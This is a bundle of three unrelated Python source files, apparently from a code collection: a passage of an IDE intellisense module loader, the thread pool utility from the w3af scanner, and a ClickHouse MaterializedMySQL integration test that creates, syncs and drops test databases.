os.path.join(self.data_root_path,str(current_interpreter.Id)),e)
utils.get_logger().exception("")
def load_intellisence_data(self,interpreter):
self._loader.Load(interpreter)
def GetImportList(self):
#全局加载的导入模块列表
import_list = self._loader.ImportList
current_project = GetApp().MainFrame.GetProjectView(False).GetCurrentProject()
if current_project is not None:
#当前项目里面的导入模块列表
try:
l = copy.copy(current_project.db_loader.import_list)
l.extend(import_list)
import_list = l
except:
pass
return import_list
def GetBuiltinMemberList(self,name):
if self._loader.BuiltinModule is None:
return False,[]
return self._loader.BuiltinModule.GetBuiltInTypeMembers(name)
def GetMemberList(self,name):
names = name.split(".")
name_count = len(names)
i = 1
module_name = ""
while i <= name_count:
fit_name = ".".join(names[:i])
if self.HasModule(fit_name):
module_name = fit_name
else:
break
i += 1
if not self.HasModule(module_name):
return []
module = self.GetModule(module_name)
child_names = names[i:]
return module.GetMembers(child_names)
def GetBuiltinModule(self):
return self._loader.BuiltinModule
def GetTypeObjectMembers(self,obj_type):
if self._loader.BuiltinModule is None or obj_type == config.ASSIGN_TYPE_UNKNOWN:
return []
type_obj = self._loader.BuiltinModule.GetTypeNode(obj_type)
return type_obj.GetMemberList()
def GetModule(self,name):
d = self.GetModules()
if name in d:
return ModuleLoader(name,d[name][ModuleLoader.MEMBERS_KEY],d[name][ModuleLoader.MEMBER_LIST_KEY],self)
return None
def HasModule(self,name):
return name in self.GetModules()
def GetModules(self):
#所有模块为当前项目的所有模块加上全局模块
current_project = GetApp().MainFrame.GetProjectView(False).GetCurrentProject()
if current_project is None:
return self._loader.module_dicts
try:
d = copy.copy(self._loader.module_dicts)
d.update(current_project.db_loader.module_dicts)
return d
except:
return self._loader.module_dicts
def GetModuleMembers(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return []
return module.GetMembersWithName(child_name)
def GetModuleMember(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return []
return module.FindDefinitionWithName(child_name)
def GetBuiltinModuleMembers(self):
if self.GetBuiltinModule() is None:
return []
utils.GetLogger().debug('get builtin module name is:%s',self.GetBuiltinModule().Name)
return self.GetModuleMembers(self.GetBuiltinModule().Name,"")
def GetModuleDoc(self,module_name):
module = self.GetModule(module_name)
if module is None:
return None
return module.GetDoc()
def GetModuleMemberArgmentTip(self,module_name,child_name):
module = self.GetModule(module_name)
if module is None:
return None
scopes = module.FindDefinitionWithName(child_name)
if not scopes:
return ''
return scopes[0].GetArgTip()
def AddUnfinishModuleFile(self,module_file):
'''
将需要再次分析的模块添加到unfinish列表当中
'''
interpreter = GetApp().GetCurrentInterpreter()
if not interpreter.Path in self.unfinish_files:
self.unfinish_files[interpreter.Path] = set([module_file])
else:
self.unfinish_files[interpreter.Path].add(module_file)
def WriteUnfinishFiles(self):
'''
保存unfinish列表,以便下次运行run.py时强制分析这些模块并重新生成数据库
'''
if len(self.unfinish_files) > 0:
unfinished_file_name = "unfinish.txt"
for interpreter_path in self.unfinish_files:
interpreter = interpretermanager.InterpreterManager().GetInterpreterByPath(interpreter_path)
database_path = self.GetInterpreterDatabasePath(interpreter)
unfinished_file_path = os.path.join(database_path,unfinished_file_name)
with open(unfinished_file_path,"w") as f:
unfinish_file_paths = list(self.unfinish_files[interpreter_path])
for path in unfinish_file_paths:
f.write(path + "\n")
|
threadpool.py
|
"""
threadpool.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
import time
import Queue
import threading
import traceback
from functools import partial
from multiprocessing.dummy import Process, current_process
from multiprocessing.util import Finalize, debug
from multiprocessing import cpu_count
from .pool276 import ThreadPool, RUN, create_detailed_pickling_error, mapstar
from w3af.core.data.fuzzer.utils import rand_alnum
from w3af.core.controllers.threads.decorators import apply_with_return_error
__all__ = ['Pool', 'return_args', 'one_to_many']
class one_to_many(object):
"""
This is a simple wrapper that translates one argument to many in a function
call. Useful for passing to the threadpool map function.
"""
def __init__(self, func):
self.func_orig = func
# Similar to functools wraps
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, args):
return self.func_orig(*args)
class return_args(object):
"""
Utility function that returns the args in the result, useful when calling
functions like imap_unordered().
"""
def __init__(self, func, *args, **kwds):
self.func = partial(func, *args, **kwds)
# Similar to functools wraps
self.func_orig = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, *args, **kwds):
return args, self.func(*args, **kwds)
class DaemonProcess(Process):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
super(DaemonProcess, self).__init__(group, target, name, args, kwargs)
self.daemon = True
self.worker = target
self.name = name
def get_state(self):
state = self.worker.get_state()
state['name'] = self.name
return state
def is_idle(self):
return self.worker.is_idle()
def start(self):
"""
This is a race condition in DaemonProcess.start() which was found
during some of the test scans I run. The race condition exists
because we're using Threads for a Pool that was designed to be
used with real processes: thus there is no worker.exitcode,
thus it has to be simulated in a race condition-prone way.
I'm overriding this method in order to move this line:
self._start_called = True
Closer to the call to .start(), which should reduce the chances
of triggering the race conditions by 1% ;-)
"""
assert self._parent is current_process()
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
self._start_called = True
threading.Thread.start(self)
def add_traceback_string(_exception):
"""
Add the traceback string as a new attribute to the exception raised
by the target function defined by the developer.
Adding this original traceback allows us to better understand the
root cause for exceptions that happen in functions which are run inside
the Pool (most).
For example, this is an exception stored in a /tmp/w3af-crash file before
this patch:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
File "/home/user/tools/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py", line 533, in _discover_worker
result = plugin.discover_wrapper(fuzzable_request)
File "/home/user/tools/w3af/w3af/core/controllers/plugins/crawl_plugin.py", line 53, in crawl_wrapper
return self.crawl(fuzzable_request_copy)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 148, in crawl
self.worker_pool.map_multi_args(self._check_and_analyze, args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 430, in map_multi_args
return self.map_async(one_to_many(func), iterable, chunksize).get()
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 643, in get
raise self._value
And after adding the original traceback and using it in exception_handler.py:
A "TypeError" exception was found while running crawl.phpinfo on "Method: GET | http://domain/".
The exception was: "unsupported operand type(s) for -: 'float' and 'NoneType'" at pool276.py:get():643.
The full traceback is:
Traceback (most recent call last):
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 238, in __call__
result = (True, func(*args, **kwds))
File "/home/user/tools/w3af/w3af/core/controllers/threads/pool276.py", line 67, in mapstar
return map(*args)
File "/home/user/tools/w3af/w3af/core/controllers/threads/threadpool.py", line 55, in __call__
return self.func_orig(*args)
File "/home/user/tools/w3af/w3af/plugins/crawl/phpinfo.py", line 180, in _check_and_analyze
1.0 - None
TypeError: unsupported operand type(s) for -: 'float' and 'NoneType'
The exact line where the exception is raised is shown!
Adding new attributes to instances is not something I like, but in
this case I had no choice...
Creating a new Exception type and wrapping all exceptions generated
by the pool with that one wouldn't work: we lose the exception type
and can't do:
try:
...
except TypeError:
...
The code for the whole framework would need to be changed to something
like:
try:
...
except PoolException, pe:
if isinstance(pe.original_exception, TypeError):
...
:param _exception: The exception instance where to add the new attribute
:return: None
"""
except_type, except_class, tb = sys.exc_info()
tb = traceback.format_exception(type(_exception), _exception, tb)
_exception.original_traceback_string = ''.join(tb)
class Worker(object):
__slots__ = ('func', 'args', 'kwargs', 'start_time', 'job', 'id')
def __init__(self):
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
self.id = rand_alnum(8)
def is_idle(self):
return self.func is None
def get_real_func_name(self):
"""
Because of various levels of abstraction the function name is not always in
self.func.__name__, this method "unwraps" the abstractions and shows us
something easier to digest.
:return: The function name
"""
if self.func is None:
return None
if self.func is mapstar:
self.func = self.args[0][0]
self.args = self.args[0][1:]
if self.func is apply_with_return_error:
self.func = self.args[0][0]
self.args = self.args[0][1:]
if isinstance(self.func, return_args):
return self.func.func_orig.__name__
if isinstance(self.func, one_to_many):
return self.func.func_orig.__name__
return self.func.__name__
def get_state(self):
func_name = self.get_real_func_name()
return {'func_name': func_name,
'args': self.args,
'kwargs': self.kwargs,
'start_time': self.start_time,
'idle': self.is_idle(),
'job': self.job,
'worker_id': self.id}
def __call__(self, inqueue, outqueue, initializer=None, initargs=(), maxtasks=None):
assert maxtasks is None or (type(maxtasks) in (int, long) and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, IOError):
debug('worker got EOFError or IOError -- exiting')
break
if task is None:
debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
# Tracking
self.func = func
self.args = args
self.kwargs = kwds
self.start_time = time.time()
self.job = job
try:
result = (True, func(*args, **kwds))
except Exception, e:
add_traceback_string(e)
result = (False, e)
# Tracking
self.func = None
self.args = None
self.kwargs = None
self.start_time = None
self.job = None
try:
put((job, i, result))
except Exception as e:
wrapped = create_detailed_pickling_error(e, result[1])
put((job, i, (False, wrapped)))
finally:
# https://bugs.python.org/issue29861
task = None
job = None
result = None
func = None
args = None
kwds = None
completed += 1
debug('worker exiting after %d tasks' % completed)
class Pool(ThreadPool):
def __init__(self, processes=None, initializer=None, initargs=(),
worker_names=None, maxtasksperchild=None,
max_queued_tasks=0):
"""
Overriding this method in order to:
* Name the pool worker threads
* Name the threads used for managing the Pool internals
"""
self.Process = partial(DaemonProcess, name=worker_names)
self.worker_names = worker_names
# Setting the max number of queued tasks for the ThreadPool is not
# as simple as it looks.
#
# First I tried to limit the max size of self._inqueue (defined
# in _setup_queues), that didn't work.
#
# Then I tried to limit the size for self._taskqueue, that didn't
# work either.
#
# I had to set the maxsize of self._taskqueue to 1 and use the
# max_queued_tasks parameter to limit the size of self._inqueue
# This is required due to the ThreadPool internals, see the
# definition of the _handle_tasks method in pool276.py where
# the function is reading from self._taskqueue and writing to
# self._inqueue.
#
# Not setting the limit in self._taskqueue allows the main thread
# to enqueue an infinite number of tasks.
#
# Only setting the limit in self._taskqueue will not work, since
# the _handle_tasks method is always reading from that queue
# (which decreases its size) and writing to self._inqueue. Because
# of those reads to self._taskqueue, the queue never reaches the
# limit.
#
if max_queued_tasks != 0:
assert max_queued_tasks - 1 > 0, 'max_queued_tasks needs to be at least 2'
self._setup_queues(max_queued_tasks - 1)
self._taskqueue = Queue.Queue(maxsize=1)
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
try:
processes = cpu_count()
except NotImplementedError:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
self._processes = processes
self._pool = []
self._repopulate_pool()
self._worker_handler = threading.Thread(
target=Pool._handle_workers,
args=(self, ),
name='PoolWorkerHandler')
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
self._task_handler = threading.Thread(
target=Pool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache),
name='PoolTaskHandler')
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
self._result_handler = threading.Thread(
target=Pool._handle_results,
args=(self._outqueue, self._quick_get, self._cache),
name='PoolResultHandler')
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15)
def get_inqueue(self):
return self._inqueue
def get_running_task_count(self):
# Cheating here a little bit because the task queued in _inqueue will
# eventually be run by the pool, but is not yet in the pool
running_tasks = self._inqueue.qsize()
for process in self._pool[:]:
if not process.is_idle():
running_tasks += 1
return running_tasks
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
I overwrite this in order to change the Process target to a Worker
object (instead of a function) in order to keep better stats of
what it is doing.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=Worker(),
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
debug('added worker')
def get_worker_count(self):
return len(self._pool)
def set_worker_count(self, count):
"""
Set the number of workers.
Keep in mind that this is not an immediate when decreasing
the pool process count!
* When increasing the size, the threadpool will call
repopulate_pool() and the new threads will be created
* When decreasing the size, a thread will finish because
of maxtasksperchild, then repopulate_pool() will be
called async and the thread will *not* be created,
thus decreasing the pool size
The change is made effective depending on the work load and
the time required to finish each task.
:param count: The new process count
:return: None
"""
assert self._maxtasksperchild, 'Can only adjust size if maxtasksperchild is set'
assert count >= 1, 'Number of processes must be at least 1'
self._processes = count
self._repopulate_pool()
def _setup_queues(self, max_queued_tasks):
self._inqueue = Queue.Queue(maxsize=max_queued_tasks)
self._outqueue = Queue.Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def map_multi_args(self, func, iterable, chunksize=None):
"""
Blocks until all results are done (please note the .get())
"""
assert self._state == RUN
return self.map_async(one_to_many(func), iterable, chunksize).get()
def in_qsize(self):
return self._taskqueue.qsize()
def is_running(self):
return self._state == RUN
def terminate_join(self):
self.terminate()
self.join()
def _join_exited_workers(self):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
if worker.exitcode is not None:
# worker exited
try:
worker.join()
except RuntimeError:
#
# RuntimeError: cannot join thread before it is started
#
# This is a race condition in DaemonProcess.start() which was found
# during some of the test scans I run. The race condition exists
# because we're using Threads for a Pool that was designed to be
# used with real processes: thus there is no worker.exitcode,
# thus it has to be simulated in a race condition-prone way.
#
continue
else:
debug('cleaning up worker %d' % i)
cleaned = True
del self._pool[i]
return cleaned
def finish(self, timeout=120):
"""
Wait until all tasks in the self._inqueue have been processed (the queue
has size == 0) and then call terminate on the Pool.
I know this is not the best way of doing it, but had some dead-lock
issues with:
self.close()
self.join()
:param timeout: Wait up to timeout seconds for the queues to be empty
"""
delay = 0.1
for _ in xrange(int(timeout / delay)):
if (self._inqueue.qsize() == 0 and
self._outqueue.qsize() == 0 and
self._taskqueue.qsize() == 0):
break
time.sleep(delay)
self.terminate()
self.join()
def inspect_threads(self):
"""
This method inspects the attributes exposed by the Worker object defined
above and lets us debug the thread pool.
This is useful for answering the question: "What functions are running in
the pool right now?"
:return: Data as a list of dicts, which is usually sent to inspect_data_to_log()
"""
inspect_data = []
for process in self._pool[:]:
worker_state = process.get_state()
inspect_data.append(worker_state)
return inspect_data
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
logging.debug(f"latest_result {lastest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
